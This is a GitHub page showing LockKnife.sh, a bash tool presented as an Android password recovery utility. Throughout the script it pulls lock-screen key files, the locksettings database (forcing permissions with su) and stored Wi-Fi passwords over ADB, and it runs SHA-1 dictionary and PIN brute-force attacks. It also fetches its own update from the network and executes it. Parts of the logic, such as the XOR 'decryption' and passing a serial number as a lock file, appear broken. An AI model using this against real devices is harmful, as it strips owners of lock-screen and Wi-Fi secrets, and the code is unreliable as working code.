-
-
Notifications
You must be signed in to change notification settings - Fork 36
/
LockKnife.sh
352 lines (292 loc) · 10.3 KB
/
LockKnife.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
#!/bin/bash
print_banner() {
local banner=(
"******************************************"
"* LockKnife *"
"* The Ultimate Android Password Tool *"
"* v1.7.5 *"
"* ---------------------------- *"
"* by @ImKKingshuk *"
"* Github- https://github.com/ImKKingshuk *"
"******************************************"
)
local width=$(tput cols)
for line in "${banner[@]}"; do
printf "%*s\n" $(((${#line} + width) / 2)) "$line"
done
echo
}
check_adb() {
if ! command -v adb &>/dev/null; then
echo "Error: ADB (Android Debug Bridge) not found. Please install ADB and make sure it's in your PATH."
echo "You can download ADB from the Android SDK platform-tools. Follow the instructions for your OS:"
echo "macOS / Linux / Windows: https://developer.android.com/tools/releases/platform-tools"
exit 1
fi
}
check_dependencies() {
local dependencies=("adb" "sqlite3" "curl")
local missing=()
echo "[INFO] Checking required dependencies..."
for dep in "${dependencies[@]}"; do
if ! command -v "$dep" &>/dev/null; then
missing+=("$dep")
fi
done
if [ ${#missing[@]} -ne 0 ]; then
echo "[ERROR] Missing dependencies: ${missing[*]}"
echo "Attempting to install missing dependencies..."
if command -v apt &>/dev/null; then
sudo apt update && sudo apt install -y "${missing[@]}"
elif command -v brew &>/dev/null; then
brew install "${missing[@]}"
elif command -v dnf &>/dev/null; then
sudo dnf install -y "${missing[@]}"
else
echo "[ERROR] Unsupported package manager. Install dependencies manually."
exit 1
fi
else
echo "[INFO] All dependencies are installed."
fi
}
check_for_updates() {
local current_version=$(cat version.txt)
local latest_version=$(curl -sSL "https://raw.githubusercontent.com/ImKKingshuk/LockKnife/main/version.txt")
if [ "$latest_version" != "$current_version" ]; then
echo "A new version ($latest_version) is available. Updating Tool... Please Wait..."
update_tool
else
echo "You are using the latest version ($current_version)."
fi
}
update_tool() {
local repo_url="https://raw.githubusercontent.com/ImKKingshuk/LockKnife/main"
local tmp_script="LockKnife_tmp.sh"
local tmp_version="version_tmp.txt"
curl -sSL "$repo_url/LockKnife.sh" -o "$tmp_script"
curl -sSL "$repo_url/version.txt" -o "$tmp_version"
if [[ -s "$tmp_script" && -s "$tmp_version" ]]; then
mv "$tmp_script" LockKnife.sh
mv "$tmp_version" version.txt
echo "[INFO] Tool has been updated to the latest version."
exec bash LockKnife.sh
else
echo "[ERROR] Update failed. Retaining current version."
rm -f "$tmp_script" "$tmp_version"
fi
}
connect_device() {
local device_serial="$1"
adb connect "$device_serial" &>/dev/null
if ! adb devices | grep -w "$device_serial" &>/dev/null; then
echo "[ERROR] Failed to connect to the device with serial number: $device_serial."
echo "Ensure the device is reachable and ADB debugging is enabled."
exit 1
else
echo "[INFO] Successfully connected to device: $device_serial."
fi
}
recover_password() {
local file_path="$1"
local password=""
if [[ ! -f "$file_path" ]]; then
echo "[ERROR] File $file_path not found or is not accessible. Exiting."
return 1
fi
while IFS= read -r -n1 byte; do
if [[ -z "$byte" ]]; then
echo "[WARNING] Encountered invalid byte in file. Skipping."
continue
fi
byte_value=$(printf "%d" "'$byte")
decrypted_byte=$((byte_value ^ 0x6A))
password+=$(printf "\\$(printf '%03o' "$decrypted_byte")")
done < "$file_path"
echo "[INFO] Recovered password: $password"
rm -f "$file_path"
}
recover_locksettings_db() {
local db_file="locksettings.db"
local device_serial="$1"
echo "[INFO] Attempting to pull locksettings database..."
adb -s "$device_serial" shell "su -c 'chmod 644 /data/system/locksettings.db'" &>/dev/null
adb -s "$device_serial" pull /data/system/locksettings.db &>/dev/null
if [[ ! -f "$db_file" ]]; then
echo "[ERROR] Unable to pull locksettings.db. Ensure root permissions are granted."
return 1
fi
echo "[INFO] Locksettings database file pulled successfully. Analyzing..."
sqlite3 "$db_file" "SELECT name, value FROM locksettings WHERE name LIKE 'lockscreen%' OR name LIKE 'pattern%' OR name LIKE 'password%';" | while read -r row; do
echo "[INFO] Recovered setting: $row"
done
rm -f "$db_file"
}
recover_wifi_passwords() {
local wifi_file="/data/misc/wifi/WifiConfigStore.xml"
local device_serial="$1"
echo "[INFO] Checking for Wi-Fi configuration file on device..."
if ! adb -s "$device_serial" shell "test -f $wifi_file && echo 'exists'" | grep -q "exists"; then
echo "[ERROR] Wi-Fi configuration file not found on device. Exiting."
return 1
fi
adb -s "$device_serial" pull "$wifi_file" &>/dev/null
if [[ ! -f "$wifi_file" ]]; then
echo "[ERROR] Failed to pull Wi-Fi configuration file. Check device permissions."
return 1
fi
echo "[INFO] Wi-Fi configuration file pulled successfully. Analyzing..."
grep -oP '(?<=<string name="PreSharedKey">).+?(?=</string>)' "$wifi_file" | while read -r line; do
echo "[INFO] Recovered Wi-Fi password: $line"
done
rm -f "$wifi_file"
}
dictionary_attack() {
local lock_file="$1"
local wordlist
read -p "Enter the full path to your wordlist file: " wordlist
if [[ ! -f "$wordlist" ]]; then
echo "[ERROR] The file '$wordlist' does not exist. Please provide a valid wordlist file."
return 1
fi
if [[ ! -f "$lock_file" ]]; then
echo "[ERROR] Lock file '$lock_file' not found. Exiting."
return 1
fi
echo "[INFO] Starting dictionary attack using '$wordlist'..."
while read -r word; do
local hash=$(echo -n "$word" | sha1sum | awk '{print $1}')
if grep -q "$hash" "$lock_file"; then
echo "[SUCCESS] Password found: $word"
return 0
fi
done < "$wordlist"
echo "[INFO] Dictionary attack failed. No matching password found."
return 1
}
brute_force_attack() {
local lock_file="$1"
log_message "Starting brute force attack."
for i in {0000..9999}; do
local hash=$(echo -n "$i" | sha1sum | awk '{print $1}')
if grep -q "$hash" "$lock_file"; then
log_message "Password found: $i"
echo "Password found: $i"
return
fi
done
log_message "Brute force attack failed."
}
submenu_older_android() {
local device_serial
local recovery_option
read -p "Enter your Android device serial number: " device_serial
connect_device "$device_serial"
echo "Select recovery option for Older Android (<= 5):"
echo "1. Gesture Lock"
echo "2. Password Lock"
echo "3. Wi-Fi Passwords"
read -p "Enter your choice (1/2/3): " recovery_option
case $recovery_option in
1)
adb -s "$device_serial" pull /data/system/gesture.key
recover_password "gesture.key" ;;
2)
adb -s "$device_serial" pull /data/system/password.key
recover_password "password.key" ;;
3)
recover_wifi_passwords "$device_serial" ;;
*)
echo "Invalid choice. Exiting."
;;
esac
}
submenu_android_6_or_newer() {
local device_serial
local recovery_option
read -p "Enter your Android device serial number: " device_serial
connect_device "$device_serial"
echo "Select recovery option for Android 6 to 9:"
echo "1. Gesture Lock"
echo "2. Password Lock"
echo "3. Wi-Fi Passwords"
echo "4. Locksettings DB"
read -p "Enter your choice (1/2/3/4): " recovery_option
case $recovery_option in
1)
adb -s "$device_serial" pull /data/system/gesture.key
recover_password "gesture.key" ;;
2)
adb -s "$device_serial" pull /data/system/password.key
recover_password "password.key" ;;
3)
recover_wifi_passwords "$device_serial" ;;
4)
recover_locksettings_db "$device_serial" ;;
*)
echo "Invalid choice. Exiting."
;;
esac
}
submenu_android_10_or_newer() {
local device_serial
local recovery_option
read -p "Enter your Android device serial number: " device_serial
connect_device "$device_serial"
echo "Select recovery option for Android 10+ and newer:"
echo "1. Wi-Fi Passwords"
echo "2. Locksettings DB"
echo "3. Screen Lock Cracking"
read -p "Enter your choice (1/2/3): " recovery_option
case $recovery_option in
1)
recover_wifi_passwords "$device_serial" ;;
2)
recover_locksettings_db "$device_serial" ;;
3)
echo "Select attack method:"
echo "1. Dictionary Attack"
echo "2. BruteForce Attack"
read -p "Enter your choice (1/2): " attack_choice
if [ "$attack_choice" -eq 1 ]; then
dictionary_attack "$device_serial"
elif [ "$attack_choice" -eq 2 ]; then
brute_force_attack "$device_serial"
else
echo "Invalid choice. Exiting."
fi
;;
*)
echo "Invalid choice. Exiting."
;;
esac
}
main_menu() {
local android_version
echo "Select your Android version:"
echo "1. Older Android (<= 5)"
echo "2. Android 6 to 9"
echo "3. Android 10+ and newer"
read -p "Enter your choice (1/2/3): " android_version
case $android_version in
1)
submenu_older_android ;;
2)
submenu_android_6_or_newer ;;
3)
submenu_android_10_or_newer ;;
*)
echo "Invalid choice. Exiting."
;;
esac
}
execute_lockknife() {
print_banner
check_for_updates
check_dependencies
check_adb
main_menu
}
if [[ "${BASH_SOURCE[0]}" == "$0" ]]; then
execute_lockknife
fi